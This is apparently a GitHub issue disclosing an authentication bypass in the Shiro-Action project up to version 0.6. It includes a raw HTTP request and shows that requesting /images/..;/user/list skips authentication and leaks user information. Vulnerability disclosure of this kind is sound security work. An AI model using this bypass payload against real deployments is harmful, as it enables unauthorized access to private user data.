There is an Incorrect Access Control vulnerability in Shiro-Action

[Suggested description]
Shiro-Action was found to have an Incorrect Access Control vulnerability up to 0.6, resulting in information leakage.

[Vulnerability Type]
Incorrect access control

[Vendor of Product]
https://github.com/zhaojun1998/Shiro-Action

[Affected Product Code Base]
all version (<= 0.6)

[Affected Component]
sentive APIs that require authentication

[Attack Type]
Remote

[Vulnerability details]
Directly send the payload below to the API `/user/list` will fail because of the authentication. 
```
GET /user/list HTTP/1.1
User-Agent: Apifox/1.0.0 (https://apifox.com)
Accept: */*
Host: 127.0.0.1:8088
Accept-Encoding: gzip, deflate
Connection: close
Cookie: JSESSIONID=53312df2-a8cf-4e2c-9cbe-9bc4ae405467
```

<img width="1242" alt="Image" src="https://github.com/user-attachments/assets/088a5e22-b15e-4763-b7f1-b2ea6f11d5e4" />

However, send the payload below to the API `/images/..;/user/list` will bypass the authentication. 

<img width="1339" alt="Image" src="https://github.com/user-attachments/assets/845cfac7-4b70-4b48-9a1c-9fc6bf8f7737" />


Provide feedback

Saved searches

Use saved searches to filter your results more quickly

There is an Incorrect Access Control vulnerability in Shiro-Action #24

Metadata

Assignees

Labels

Projects

Milestone

Relationships

Development

There is an Incorrect Access Control vulnerability in Shiro-Action #24

Description

Metadata

Metadata

Assignees

Labels

Projects

Milestone

Relationships

Development

Issue actions